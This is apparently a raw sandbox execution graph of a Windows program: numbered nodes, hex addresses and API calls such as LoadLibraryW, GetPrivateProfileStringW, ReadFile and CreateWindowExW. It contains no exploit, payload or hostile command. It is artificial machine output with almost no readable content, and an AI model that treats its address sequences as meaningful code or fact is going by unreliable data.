                                                              execution_graph 37631 44dea5 37632 44deb5 FreeLibrary 37631->37632 37633 44dec3 37631->37633 37632->37633 39958 4147f3 39961 414561 39958->39961 39960 414813 39962 41456d 39961->39962 39963 41457f GetPrivateProfileIntW 39961->39963 39966 4143f1 memset _itow WritePrivateProfileStringW 39962->39966 39963->39960 39965 41457a 39965->39960 39966->39965 37634 4287c1 37635 4287d2 37634->37635 37638 429ac1 37634->37638 37639 428818 37635->37639 37640 42881f 37635->37640 37649 425711 37635->37649 37636 4259da 37697 416760 11 API calls 37636->37697 37668 425ad6 37638->37668 37704 415c56 11 API calls 37638->37704 37671 42013a 37639->37671 37699 420244 97 API calls 37640->37699 37642 4260dd 37698 424251 120 API calls 37642->37698 37645 4259c2 37645->37668 37691 415c56 11 API calls 37645->37691 37649->37636 37649->37638 37649->37645 37652 429a4d 37649->37652 37655 422aeb memset memcpy memcpy 37649->37655 37659 4260a1 37649->37659 37667 425a38 37649->37667 37687 4227f0 memset memcpy 37649->37687 37688 422b84 15 API calls 37649->37688 37689 422b5d memset memcpy memcpy 37649->37689 37690 422640 13 API calls 37649->37690 37692 4241fc 11 API calls 37649->37692 37693 42413a 90 API calls 37649->37693 37653 429a66 37652->37653 37654 429a9b 37652->37654 37700 415c56 11 API calls 37653->37700 37658 429a96 37654->37658 37702 416760 11 API calls 37654->37702 37655->37649 37703 424251 120 API calls 37658->37703 37696 415c56 11 API calls 37659->37696 37661 429a7a 37701 416760 11 API calls 37661->37701 37667->37645 37694 422640 13 API calls 37667->37694 37695 4226e0 12 API calls 37667->37695 37672 42014c 37671->37672 37675 420151 37671->37675 37714 41e466 97 API calls 37672->37714 37674 420162 37674->37649 37675->37674 37676 4201b3 37675->37676 37677 420229 37675->37677 37678 4201b8 37676->37678 37679 4201dc 37676->37679 37677->37674 37680 41fd5e 86 API calls 37677->37680 37705 41fbdb 37678->37705 37679->37674 37683 4201ff 37679->37683 37711 41fc4c 37679->37711 37680->37674 37683->37674 37686 42013a 97 API calls 37683->37686 37686->37674 37687->37649 37688->37649 37689->37649 37690->37649 37691->37636 37692->37649 37693->37649 37694->37667 37695->37667 37696->37636 37697->37642 37698->37668 37699->37649 37700->37661 37701->37658 37702->37658 37703->37638 37704->37636 37706 41fbf1 37705->37706 37707 41fbf8 37705->37707 37710 41fc39 37706->37710 37729 4446ce 11 API calls 37706->37729 37719 41ee26 37707->37719 37710->37674 37715 41fd5e 37710->37715 37712 41ee6b 86 API calls 37711->37712 37713 41fc5d 37712->37713 37713->37679 37714->37675 37718 41fd65 37715->37718 37716 41fdab 37716->37674 37717 41fbdb 86 API calls 37717->37718 37718->37716 37718->37717 37720 41ee41 37719->37720 37721 41ee32 37719->37721 37730 41edad 37720->37730 37733 4446ce 11 API calls 37721->37733 37724 41ee3c 37724->37706 37727 41ee58 37727->37724 37735 41ee6b 37727->37735 37729->37710 37739 41be52 37730->37739 37733->37724 37734 41eb85 11 API calls 37734->37727 37736 41ee70 37735->37736 37737 41ee78 37735->37737 37795 41bf99 86 API calls 37736->37795 37737->37724 37740 41be6f 37739->37740 37741 41be5f 37739->37741 37746 41be8c 37740->37746 37760 418c63 37740->37760 37774 4446ce 11 API calls 37741->37774 37743 41be69 37743->37724 37743->37734 37746->37743 37747 41bf3a 37746->37747 37749 41bed1 37746->37749 37751 41bee7 37746->37751 37777 4446ce 11 API calls 37747->37777 37750 41bef0 37749->37750 37753 41bee2 37749->37753 37750->37751 37752 41bf01 37750->37752 37751->37743 37778 41a453 86 API calls 37751->37778 37754 41bf24 memset 37752->37754 37756 41bf14 37752->37756 37775 418a6d memset memcpy memset 37752->37775 37764 41ac13 37753->37764 37754->37743 37776 41a223 memset memcpy memset 37756->37776 37759 41bf20 37759->37754 37762 418c72 37760->37762 37761 418c94 37761->37746 37762->37761 37763 418d51 memset memset 37762->37763 37763->37761 37765 41ac3f memset 37764->37765 37766 41ac52 37764->37766 37771 41acd9 37765->37771 37768 41ac6a 37766->37768 37779 41dc14 19 API calls 37766->37779 37769 41aca1 37768->37769 37780 41519d 37768->37780 37769->37771 37772 41acc0 memset 37769->37772 37773 41accd memcpy 37769->37773 37771->37751 37772->37771 37773->37771 37774->37743 37775->37756 37776->37759 37777->37751 37779->37768 37783 4175ed 37780->37783 37791 417570 SetFilePointer 37783->37791 37786 41760a ReadFile 37787 417637 37786->37787 37788 417627 GetLastError 37786->37788 37789 4151b3 37787->37789 37790 41763e memset 37787->37790 37788->37789 37789->37769 37790->37789 37792 41759c GetLastError 37791->37792 37794 4175b2 37791->37794 37793 4175a8 GetLastError 37792->37793 37792->37794 37793->37794 37794->37786 37794->37789 37795->37737 39967 44def7 39968 44df07 39967->39968 39969 44df00 ??3@YAXPAX 39967->39969 39970 44df17 39968->39970 39971 44df10 ??3@YAXPAX 39968->39971 39969->39968 39972 44df27 39970->39972 39973 44df20 ??3@YAXPAX 39970->39973 39971->39970 39974 44df37 39972->39974 39975 44df30 ??3@YAXPAX 39972->39975 39973->39972 39975->39974 37796 417bc5 37797 417c61 37796->37797 37798 417bda 37796->37798 37798->37797 37799 417bf6 UnmapViewOfFile CloseHandle 37798->37799 37801 417c2c 37798->37801 37803 4175b7 37798->37803 37799->37798 37799->37799 37801->37798 37808 41851e 20 API calls 37801->37808 37804 4175d6 CloseHandle 37803->37804 37805 4175c8 37804->37805 37806 4175df 37804->37806 37805->37806 37807 4175ce Sleep 37805->37807 37806->37798 37807->37804 37808->37801 37809 4152c7 malloc 37810 4152ef 37809->37810 37812 4152e2 37809->37812 37813 416760 11 API calls 37810->37813 37813->37812 39976 4148b6 FindResourceW 39977 4148cf SizeofResource 39976->39977 39980 4148f9 39976->39980 39978 4148e0 LoadResource 39977->39978 39977->39980 39979 4148ee LockResource 39978->39979 39978->39980 39979->39980 37814 415308 free 39981 441b3f 39991 43a9f6 39981->39991 39983 441b61 40164 4386af memset 39983->40164 39985 44189a 39986 442bd4 39985->39986 39987 4418e2 39985->39987 39988 4418ea 39986->39988 40166 441409 memset 39986->40166 39987->39988 40165 4414a9 12 API calls 39987->40165 39992 43aa20 39991->39992 39993 43aadf 39991->39993 39992->39993 39994 43aa34 memset 39992->39994 39993->39983 39995 43aa56 39994->39995 39996 43aa4d 39994->39996 40167 43a6e7 39995->40167 40175 42c02e memset 39996->40175 40001 43aad3 40177 4169a7 11 API calls 40001->40177 40002 43aaae 40002->39993 40002->40001 40017 43aae5 40002->40017 40004 43ac18 40006 43ac47 40004->40006 40179 42bbd5 memcpy memcpy memcpy memset memcpy 40004->40179 40007 43aca8 40006->40007 40180 438eed 16 API calls 40006->40180 40011 43acd5 40007->40011 40182 4233ae 11 API calls 40007->40182 40010 43ac87 40181 4233c5 16 API calls 40010->40181 40183 423426 11 API calls 40011->40183 40015 43ace1 40184 439811 163 API calls 40015->40184 40016 43a9f6 161 API calls 40016->40017 40017->39993 40017->40004 40017->40016 40178 439bbb 22 API calls 40017->40178 40019 43acfd 40025 43ad2c 40019->40025 40185 438eed 16 API calls 40019->40185 40021 43ad19 40186 4233c5 16 API calls 40021->40186 40023 43ad58 40187 44081d 163 API calls 40023->40187 40025->40023 40027 43add9 40025->40027 40027->40027 40191 423426 11 API calls 40027->40191 40028 43ae3a memset 40029 43ae73 40028->40029 40192 42e1c0 147 API calls 40029->40192 40030 43adab 40189 438c4e 163 API calls 40030->40189 40032 43ad6c 40032->39993 40032->40030 40188 42370b memset memcpy memset 40032->40188 40034 43ae96 40193 42e1c0 147 API calls 40034->40193 40036 43adcc 40190 440f84 12 API calls 40036->40190 40039 43aea8 40040 43aec1 40039->40040 40194 42e199 147 API calls 40039->40194 40042 43af00 40040->40042 40195 42e1c0 147 API calls 40040->40195 40042->39993 40045 43af1a 40042->40045 40046 43b3d9 40042->40046 40196 438eed 16 API calls 40045->40196 40051 43b3f6 40046->40051 40058 43b4c8 40046->40058 40048 43b60f 40048->39993 40255 4393a5 17 API calls 40048->40255 40049 43af2f 40197 4233c5 16 API calls 40049->40197 40237 432878 12 API calls 40051->40237 40053 43af51 40198 423426 11 API calls 40053->40198 40056 43af7d 40199 423426 11 API calls 40056->40199 40057 43b4f2 40244 43a76c 21 API calls 40057->40244 40058->40057 40243 42bbd5 memcpy memcpy memcpy memset memcpy 40058->40243 40062 43b529 40245 44081d 163 API calls 40062->40245 40063 43b428 40091 43b462 40063->40091 40238 432b60 16 API calls 40063->40238 40064 43af94 40200 423330 11 API calls 40064->40200 40068 43b47e 40071 43b497 40068->40071 40240 42374a memcpy memset memcpy memcpy memcpy 40068->40240 40069 43b544 40079 43b55c 40069->40079 40246 42c02e memset 40069->40246 40070 43afca 40201 423330 11 API calls 40070->40201 40241 4233ae 11 API calls 40071->40241 40076 43afdb 40202 4233ae 11 API calls 40076->40202 40078 43b4b1 40242 423399 11 API calls 40078->40242 40247 43a87a 163 API calls 40079->40247 40081 43b56c 40084 43b58a 40081->40084 40248 423330 11 API calls 40081->40248 40083 43afee 40203 44081d 163 API calls 40083->40203 40249 440f84 12 API calls 40084->40249 40086 43b4c1 40251 42db80 163 API calls 40086->40251 40090 43b592 40250 43a82f 16 API calls 40090->40250 40239 423330 11 API calls 40091->40239 40094 43b5b4 40252 438c4e 163 API calls 40094->40252 40096 43b5cf 40253 42c02e memset 40096->40253 40098 43b005 40098->39993 40103 43b01f 40098->40103 40204 42d836 163 API calls 40098->40204 40099 43b1ef 40214 4233c5 16 API calls 40099->40214 40101 43b212 40215 423330 11 API calls 40101->40215 40103->40099 40212 423330 11 API calls 40103->40212 40213 42d71d 163 API calls 40103->40213 40105 43add4 40105->40048 40254 438f86 16 API calls 40105->40254 40108 43b087 40205 4233ae 11 API calls 40108->40205 40109 43b22a 40216 42ccb5 11 API calls 40109->40216 40112 43b10f 40208 423330 11 API calls 40112->40208 40113 43b23f 40217 4233ae 11 API calls 40113->40217 40115 43b257 40218 4233ae 11 API calls 40115->40218 40119 43b129 40209 4233ae 11 API calls 40119->40209 40120 43b26e 40219 4233ae 11 API calls 40120->40219 40122 43b09a 40122->40112 40206 42cc15 19 API calls 40122->40206 40207 4233ae 11 API calls 40122->40207 40124 43b282 40220 43a87a 163 API calls 40124->40220 40126 43b13c 40210 440f84 12 API calls 40126->40210 40128 43b29d 40221 423330 11 API calls 40128->40221 40131 43b15f 40211 4233ae 11 API calls 40131->40211 40132 43b2af 40134 43b2b8 40132->40134 40135 43b2ce 40132->40135 40222 4233ae 11 API calls 40134->40222 40223 440f84 12 API calls 40135->40223 40138 43b2c9 40225 4233ae 11 API calls 40138->40225 40139 43b2da 40224 42370b memset memcpy memset 40139->40224 40142 43b2f9 40226 423330 11 API calls 40142->40226 40144 43b30b 40227 423330 11 API calls 40144->40227 40146 43b325 40228 423399 11 API calls 40146->40228 40148 43b332 40229 4233ae 11 API calls 40148->40229 40150 43b354 40230 423399 11 API calls 40150->40230 40152 43b364 40231 43a82f 16 API calls 40152->40231 40154 43b370 40232 42db80 163 API calls 40154->40232 40156 43b380 40233 438c4e 163 API calls 40156->40233 40158 43b39e 40234 423399 11 API calls 40158->40234 40160 43b3ae 40235 43a76c 21 API calls 40160->40235 40162 43b3c3 40236 423399 11 API calls 40162->40236 40164->39985 40165->39988 40166->39986 40168 43a6f5 40167->40168 40174 43a765 40167->40174 40168->40174 40256 42a115 40168->40256 40172 43a73d 40173 42a115 147 API calls 40172->40173 40172->40174 40173->40174 40174->39993 40176 4397fd memset 40174->40176 40175->39995 40176->40002 40177->39993 40178->40017 40179->40006 40180->40010 40181->40007 40182->40011 40183->40015 40184->40019 40185->40021 40186->40025 40187->40032 40188->40030 40189->40036 40190->40105 40191->40028 40192->40034 40193->40039 40194->40040 40195->40040 40196->40049 40197->40053 40198->40056 40199->40064 40200->40070 40201->40076 40202->40083 40203->40098 40204->40108 40205->40122 40206->40122 40207->40122 40208->40119 40209->40126 40210->40131 40211->40103 40212->40103 40213->40103 40214->40101 40215->40109 40216->40113 40217->40115 40218->40120 40219->40124 40220->40128 40221->40132 40222->40138 40223->40139 40224->40138 40225->40142 40226->40144 40227->40146 40228->40148 40229->40150 40230->40152 40231->40154 40232->40156 40233->40158 40234->40160 40235->40162 40236->40105 40237->40063 40238->40091 40239->40068 40240->40071 40241->40078 40242->40086 40243->40057 40244->40062 40245->40069 40246->40079 40247->40081 40248->40084 40249->40090 40250->40086 40251->40094 40252->40096 40253->40105 40254->40048 40255->39993 40257 42a175 40256->40257 40259 42a122 40256->40259 40257->40174 40262 42b13b 147 API calls 40257->40262 40259->40257 40260 42a115 147 API calls 40259->40260 40263 43a174 40259->40263 40287 42a0a8 147 API calls 40259->40287 40260->40259 40262->40172 40277 43a196 40263->40277 40278 43a19e 40263->40278 40264 43a306 40264->40277 40303 4388c4 14 API calls 40264->40303 40267 42a115 147 API calls 40267->40278 40268 415a91 memset 40268->40278 40269 43a642 40269->40277 40307 4169a7 11 API calls 40269->40307 40273 43a635 40306 42c02e memset 40273->40306 40277->40259 40278->40264 40278->40267 40278->40268 40278->40277 40288 42ff8c 40278->40288 40296 4165ff 40278->40296 40299 439504 13 API calls 40278->40299 40300 4312d0 147 API calls 40278->40300 40301 42be4c memcpy memcpy memcpy memset memcpy 40278->40301 40302 43a121 11 API calls 40278->40302 40280 4169a7 11 API calls 40281 43a325 40280->40281 40281->40269 40281->40273 40281->40277 40281->40280 40282 42b5b5 memset memcpy 40281->40282 40283 42bf4c 14 API calls 40281->40283 40286 4165ff 11 API calls 40281->40286 40304 42b63e 14 API calls 40281->40304 40305 42bfcf memcpy 40281->40305 40282->40281 40283->40281 40286->40281 40287->40259 40308 43817e 40288->40308 40290 42ff99 40291 42ffe3 40290->40291 40292 42ffd0 40290->40292 40295 42ff9d 40290->40295 40313 4169a7 11 API calls 40291->40313 40312 4169a7 11 API calls 40292->40312 40295->40278 40297 4165a0 11 API calls 40296->40297 40298 41660d 40297->40298 40298->40278 40299->40278 40300->40278 40301->40278 40302->40278 40303->40281 40304->40281 40305->40281 40306->40269 40307->40277 40309 438187 40308->40309 40311 438192 40308->40311 40314 4380f6 40309->40314 40311->40290 40312->40295 40313->40295 40316 43811f 40314->40316 40315 438164 40315->40311 40316->40315 40318 4300e8 3 API calls 40316->40318 40319 437e5e 40316->40319 40318->40316 40342 437d3c 40319->40342 40321 437eb3 40321->40316 40322 437ea9 40322->40321 40328 437f22 40322->40328 40357 41f432 40322->40357 40325 437f06 40404 415c56 11 API calls 40325->40404 40327 437f95 40405 415c56 11 API calls 40327->40405 40329 437f7f 40328->40329 40330 432d4e 3 API calls 40328->40330 40329->40327 40332 43802b 40329->40332 40330->40329 40333 4165ff 11 API calls 40332->40333 40334 438054 40333->40334 40368 437371 40334->40368 40337 43806b 40338 438094 40337->40338 40406 42f50e 138 API calls 40337->40406 40340 437fa3 40338->40340 40341 4300e8 3 API calls 40338->40341 40340->40321 40407 41f638 104 API calls 40340->40407 40341->40340 40343 437d69 40342->40343 40346 437d80 40342->40346 40408 437ccb 11 API calls 40343->40408 40345 437d76 40345->40322 40346->40345 40347 437da3 40346->40347 40348 437d90 40346->40348 40350 438460 134 API calls 40347->40350 40348->40345 40412 437ccb 11 API calls 40348->40412 40353 437dcb 40350->40353 40352 437de8 40411 424f26 123 API calls 40352->40411 40353->40352 40409 444283 13 API calls 40353->40409 40355 437dfc 40410 437ccb 11 API calls 40355->40410 40358 41f54d 40357->40358 40364 41f44f 40357->40364 40359 41f466 40358->40359 40442 41c635 memset memset 40358->40442 40359->40325 40359->40328 40364->40359 40366 41f50b 40364->40366 40413 41f1a5 40364->40413 40438 41c06f memcmp 40364->40438 40439 41f3b1 90 API calls 40364->40439 40440 41f398 86 API calls 40364->40440 40366->40358 40366->40359 40441 41c295 86 API calls 40366->40441 40369 41703f 11 API calls 40368->40369 40370 437399 40369->40370 40371 43739d 40370->40371 40374 4373ac 40370->40374 40443 4446ea 11 API calls 40371->40443 40373 4373a7 40373->40337 40375 416935 16 API calls 40374->40375 40376 4373ca 40375->40376 40378 438460 134 API calls 40376->40378 40382 4251c4 137 API calls 40376->40382 40386 415a91 memset 40376->40386 40389 43758f 40376->40389 40401 437584 40376->40401 40403 437d3c 135 API calls 40376->40403 40444 425433 13 API calls 40376->40444 40445 425413 17 API calls 40376->40445 40446 42533e 16 API calls 40376->40446 40447 42538f 16 API calls 40376->40447 40448 42453e 123 API calls 40376->40448 40377 4375bc 40380 415c7d 16 API calls 40377->40380 40378->40376 40381 4375d2 40380->40381 40381->40373 40383 4442e6 11 API calls 40381->40383 40382->40376 40384 4375e2 40383->40384 40384->40373 40451 444283 13 API calls 40384->40451 40386->40376 40449 42453e 123 API calls 40389->40449 40390 4375f4 40395 437620 40390->40395 40396 43760b 40390->40396 40394 43759f 40397 416935 16 API calls 40394->40397 40399 416935 16 API calls 40395->40399 40452 444283 13 API calls 40396->40452 40397->40401 40399->40373 40401->40377 40450 42453e 123 API calls 40401->40450 40402 437612 memcpy 40402->40373 40403->40376 40404->40321 40405->40340 40406->40338 40407->40321 40408->40345 40409->40355 40410->40352 40411->40345 40412->40345 40414 41bc3b 101 API calls 40413->40414 40415 41f1b4 40414->40415 40416 41edad 86 API calls 40415->40416 40423 41f282 40415->40423 40417 41f1cb 40416->40417 40418 41f1f5 memcmp 40417->40418 40419 41f20e 40417->40419 40417->40423 40418->40419 40420 41f21b memcmp 40419->40420 40419->40423 40421 41f326 40420->40421 40424 41f23d 40420->40424 40422 41ee6b 86 API calls 40421->40422 40421->40423 40422->40423 40423->40364 40424->40421 40425 41f28e memcmp 40424->40425 40427 41c8df 56 API calls 40424->40427 40425->40421 40426 41f2a9 40425->40426 40426->40421 40429 41f308 40426->40429 40430 41f2d8 40426->40430 40428 41f269 40427->40428 40428->40421 40431 41f287 40428->40431 40432 41f27a 40428->40432 40429->40421 40436 4446ce 11 API calls 40429->40436 40433 41ee6b 86 API calls 40430->40433 40431->40425 40434 41ee6b 86 API calls 40432->40434 40435 41f2e0 40433->40435 40434->40423 40437 41b1ca memset 40435->40437 40436->40421 40437->40423 40438->40364 40439->40364 40440->40364 40441->40358 40442->40359 40443->40373 40444->40376 40445->40376 40446->40376 40447->40376 40448->40376 40449->40394 40450->40377 40451->40390 40452->40402 37815 41276d 37816 41277d 37815->37816 37858 4044a4 LoadLibraryW 37816->37858 37818 412785 37819 412789 37818->37819 37866 414b81 37818->37866 37822 4127c8 37872 412465 memset ??2@YAPAXI 37822->37872 37824 4127ea 37884 40ac21 37824->37884 37829 412813 37902 40dd07 memset 37829->37902 37830 412827 37907 40db69 memset 37830->37907 37833 412822 37928 4125b6 ??3@YAXPAX 37833->37928 37835 40ada2 _wcsicmp 37837 41283d 37835->37837 37837->37833 37840 412863 CoInitialize 37837->37840 37912 41268e 37837->37912 37932 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37840->37932 37843 41296f 37934 40b633 37843->37934 37845 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37850 412957 CoUninitialize 37845->37850 37855 4128ca 37845->37855 37850->37833 37851 4128d0 TranslateAcceleratorW 37852 412941 GetMessageW 37851->37852 37851->37855 37852->37850 37852->37851 37853 412909 IsDialogMessageW 37853->37852 37853->37855 37854 4128fd IsDialogMessageW 37854->37852 37854->37853 37855->37851 37855->37853 37855->37854 37856 41292b TranslateMessage DispatchMessageW 37855->37856 37857 41291f IsDialogMessageW 37855->37857 37856->37852 37857->37852 37857->37856 37859 4044f7 37858->37859 37860 4044cf GetProcAddress 37858->37860 37864 404507 MessageBoxW 37859->37864 37865 40451e 37859->37865 37861 4044e8 FreeLibrary 37860->37861 37862 4044df 37860->37862 37861->37859 37863 4044f3 37861->37863 37862->37861 37863->37859 37864->37818 37865->37818 37867 414b8a 37866->37867 37868 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37866->37868 37938 40a804 memset 37867->37938 37868->37822 37871 414b9e GetProcAddress 37871->37868 37873 4124e0 37872->37873 37874 412505 ??2@YAPAXI 37873->37874 37875 41251c 37874->37875 37880 412521 37874->37880 37960 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37875->37960 37949 444722 37880->37949 37883 41259b wcscpy 37883->37824 37965 40b1ab free free 37884->37965 37886 40ad76 37966 40aa04 37886->37966 37889 40a9ce malloc memcpy free free 37892 40ac5c 37889->37892 37890 40ad4b 37890->37886 37989 40a9ce 37890->37989 37892->37886 37892->37889 37892->37890 37893 40ace7 free 37892->37893 37969 40a8d0 37892->37969 37981 4099f4 37892->37981 37893->37892 37897 40a8d0 7 API calls 37897->37886 37898 40ada2 37899 40adc9 37898->37899 37900 40adaa 37898->37900 37899->37829 37899->37830 37900->37899 37901 40adb3 _wcsicmp 37900->37901 37901->37899 37901->37900 37994 40dce0 37902->37994 37904 40dd3a GetModuleHandleW 37999 40dba7 37904->37999 37908 40dce0 3 API calls 37907->37908 37909 40db99 37908->37909 38071 40dae1 37909->38071 38085 402f3a 37912->38085 37914 412766 37914->37833 37914->37840 37915 4126d3 _wcsicmp 37916 4126a8 37915->37916 37916->37914 37916->37915 37918 41270a 37916->37918 38119 4125f8 7 API calls 37916->38119 37918->37914 38088 411ac5 37918->38088 37929 4125da 37928->37929 37930 4125f0 37929->37930 37931 4125e6 DeleteObject 37929->37931 37933 40b1ab free free 37930->37933 37931->37930 37932->37845 37933->37843 37935 40b640 37934->37935 37936 40b639 free 37934->37936 37937 40b1ab free free 37935->37937 37936->37935 37937->37819 37939 40a83b GetSystemDirectoryW 37938->37939 37940 40a84c wcscpy 37938->37940 37939->37940 37945 409719 wcslen 37940->37945 37943 40a881 LoadLibraryW 37944 40a886 37943->37944 37944->37868 37944->37871 37946 409724 37945->37946 37947 409739 wcscat LoadLibraryW 37945->37947 37946->37947 37948 40972c wcscat 37946->37948 37947->37943 37947->37944 37948->37947 37950 444732 37949->37950 37951 444728 DeleteObject 37949->37951 37961 409cc3 37950->37961 37951->37950 37953 412551 37954 4010f9 37953->37954 37955 401130 37954->37955 37956 401134 GetModuleHandleW LoadIconW 37955->37956 37957 401107 wcsncat 37955->37957 37958 40a7be 37956->37958 37957->37955 37959 40a7d2 37958->37959 37959->37883 37959->37959 37960->37880 37964 409bfd memset wcscpy 37961->37964 37963 409cdb CreateFontIndirectW 37963->37953 37964->37963 37965->37892 37967 40aa14 37966->37967 37968 40aa0a free 37966->37968 37967->37898 37968->37967 37970 40a8eb 37969->37970 37971 40a8df wcslen 37969->37971 37972 40a906 free 37970->37972 37973 40a90f 37970->37973 37971->37970 37974 40a919 37972->37974 37975 4099f4 3 API calls 37973->37975 37976 40a932 37974->37976 37977 40a929 free 37974->37977 37975->37974 37979 4099f4 3 API calls 37976->37979 37978 40a93e memcpy 37977->37978 37978->37892 37980 40a93d 37979->37980 37980->37978 37982 409a41 37981->37982 37983 4099fb malloc 37981->37983 37982->37892 37985 409a37 37983->37985 37986 409a1c 37983->37986 37985->37892 37987 409a30 free 37986->37987 37988 409a20 memcpy 37986->37988 37987->37985 37988->37987 37990 40a9e7 37989->37990 37991 40a9dc free 37989->37991 37992 4099f4 3 API calls 37990->37992 37993 40a9f2 37991->37993 37992->37993 37993->37897 38018 409bca GetModuleFileNameW 37994->38018 37996 40dce6 wcsrchr 37997 40dcf5 37996->37997 37998 40dcf9 wcscat 37996->37998 37997->37998 37998->37904 38019 44db70 37999->38019 38003 40dbfd 38022 4447d9 38003->38022 38006 40dc34 wcscpy wcscpy 38048 40d6f5 38006->38048 38007 40dc1f wcscpy 38007->38006 38010 40d6f5 3 API calls 38011 40dc73 38010->38011 38012 40d6f5 3 API calls 38011->38012 38013 40dc89 38012->38013 38014 40d6f5 3 API calls 38013->38014 38015 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38014->38015 38054 40da80 38015->38054 38018->37996 38020 40dbb4 memset memset 38019->38020 38021 409bca GetModuleFileNameW 38020->38021 38021->38003 38023 4447f4 38022->38023 38024 40dc1b 38023->38024 38025 444807 ??2@YAPAXI 38023->38025 38024->38006 38024->38007 38026 44481f 38025->38026 38027 444873 _snwprintf 38026->38027 38028 4448ab wcscpy 38026->38028 38061 44474a 8 API calls 38027->38061 38030 4448bb 38028->38030 38062 44474a 8 API calls 38030->38062 38031 4448a7 38031->38028 38031->38030 38033 4448cd 38063 44474a 8 API calls 38033->38063 38035 4448e2 38064 44474a 8 API calls 38035->38064 38037 4448f7 38065 44474a 8 API calls 38037->38065 38039 44490c 38066 44474a 8 API calls 38039->38066 38041 444921 38067 44474a 8 API calls 38041->38067 38043 444936 38068 44474a 8 API calls 38043->38068 38045 44494b 38069 44474a 8 API calls 38045->38069 38047 444960 ??3@YAXPAX 38047->38024 38049 44db70 38048->38049 38050 40d702 memset GetPrivateProfileStringW 38049->38050 38051 40d752 38050->38051 38052 40d75c WritePrivateProfileStringW 38050->38052 38051->38052 38053 40d758 38051->38053 38052->38053 38053->38010 38055 44db70 38054->38055 38056 40da8d memset 38055->38056 38057 40daac LoadStringW 38056->38057 38060 40dac6 38057->38060 38059 40dade 38059->37833 38060->38057 38060->38059 38070 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38060->38070 38061->38031 38062->38033 38063->38035 38064->38037 38065->38039 38066->38041 38067->38043 38068->38045 38069->38047 38070->38060 38081 409b98 GetFileAttributesW 38071->38081 38073 40daea 38074 40daef wcscpy wcscpy GetPrivateProfileIntW 38073->38074 38080 40db63 38073->38080 38082 40d65d GetPrivateProfileStringW 38074->38082 38076 40db3e 38083 40d65d GetPrivateProfileStringW 38076->38083 38078 40db4f 38084 40d65d GetPrivateProfileStringW 38078->38084 38080->37835 38081->38073 38082->38076 38083->38078 38084->38080 38120 40eaff 38085->38120 38089 411ae2 memset 38088->38089 38090 411b8f 38088->38090 38160 409bca GetModuleFileNameW 38089->38160 38102 411a8b 38090->38102 38092 411b0a wcsrchr 38093 411b22 wcscat 38092->38093 38094 411b1f 38092->38094 38161 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38093->38161 38094->38093 38096 411b67 38162 402afb 38096->38162 38100 411b7f 38218 40ea13 SendMessageW memset SendMessageW 38100->38218 38103 402afb 27 API calls 38102->38103 38104 411ac0 38103->38104 38105 4110dc 38104->38105 38106 41113e 38105->38106 38111 4110f0 38105->38111 38243 40969c LoadCursorW SetCursor 38106->38243 38108 411143 38244 4032b4 38108->38244 38262 444a54 38108->38262 38109 4110f7 _wcsicmp 38109->38111 38110 411157 38112 40ada2 _wcsicmp 38110->38112 38111->38106 38111->38109 38265 410c46 10 API calls 38111->38265 38115 411167 38112->38115 38113 4111af 38115->38113 38116 4111a6 qsort 38115->38116 38116->38113 38119->37916 38121 40eb10 38120->38121 38133 40e8e0 38121->38133 38124 40eb6c memcpy memcpy 38125 40ebb7 38124->38125 38125->38124 38126 40ebf2 ??2@YAPAXI ??2@YAPAXI 38125->38126 38128 40d134 16 API calls 38125->38128 38127 40ec65 38126->38127 38129 40ec2e ??2@YAPAXI 38126->38129 38143 40ea7f 38127->38143 38128->38125 38129->38127 38132 402f49 38132->37916 38134 40e8f2 38133->38134 38135 40e8eb ??3@YAXPAX 38133->38135 38136 40e900 38134->38136 38137 40e8f9 ??3@YAXPAX 38134->38137 38135->38134 38138 40e911 38136->38138 38139 40e90a ??3@YAXPAX 38136->38139 38137->38136 38140 40e931 ??2@YAPAXI ??2@YAPAXI 38138->38140 38141 40e921 ??3@YAXPAX 38138->38141 38142 40e92a ??3@YAXPAX 38138->38142 38139->38138 38140->38124 38141->38142 38142->38140 38144 40aa04 free 38143->38144 38145 40ea88 38144->38145 38146 40aa04 free 38145->38146 38147 40ea90 38146->38147 38148 40aa04 free 38147->38148 38149 40ea98 38148->38149 38150 40aa04 free 38149->38150 38151 40eaa0 38150->38151 38152 40a9ce 4 API calls 38151->38152 38153 40eab3 38152->38153 38154 40a9ce 4 API calls 38153->38154 38155 40eabd 38154->38155 38156 40a9ce 4 API calls 38155->38156 38157 40eac7 38156->38157 38158 40a9ce 4 API calls 38157->38158 38159 40ead1 38158->38159 38159->38132 38160->38092 38161->38096 38219 40b2cc 38162->38219 38164 402b0a 38165 40b2cc 27 API calls 38164->38165 38166 402b23 38165->38166 38167 40b2cc 27 API calls 38166->38167 38168 402b3a 38167->38168 38169 40b2cc 27 API calls 38168->38169 38170 402b54 38169->38170 38171 40b2cc 27 API calls 38170->38171 38172 402b6b 38171->38172 38173 40b2cc 27 API calls 38172->38173 38174 402b82 38173->38174 38175 40b2cc 27 API calls 38174->38175 38176 402b99 38175->38176 38177 40b2cc 27 API calls 38176->38177 38178 402bb0 38177->38178 38179 40b2cc 27 API calls 38178->38179 38180 402bc7 38179->38180 38181 40b2cc 27 API calls 38180->38181 38182 402bde 38181->38182 38183 40b2cc 27 API calls 38182->38183 38184 402bf5 38183->38184 38185 40b2cc 27 API calls 38184->38185 38186 402c0c 38185->38186 38187 40b2cc 27 API calls 38186->38187 38188 402c23 38187->38188 38189 40b2cc 27 API calls 38188->38189 38190 402c3a 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402c51 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402c68 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402c7f 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402c99 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402cb3 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402cd5 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402cf0 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402d0b 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402d26 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402d3e 38209->38210 38211 40b2cc 27 API calls 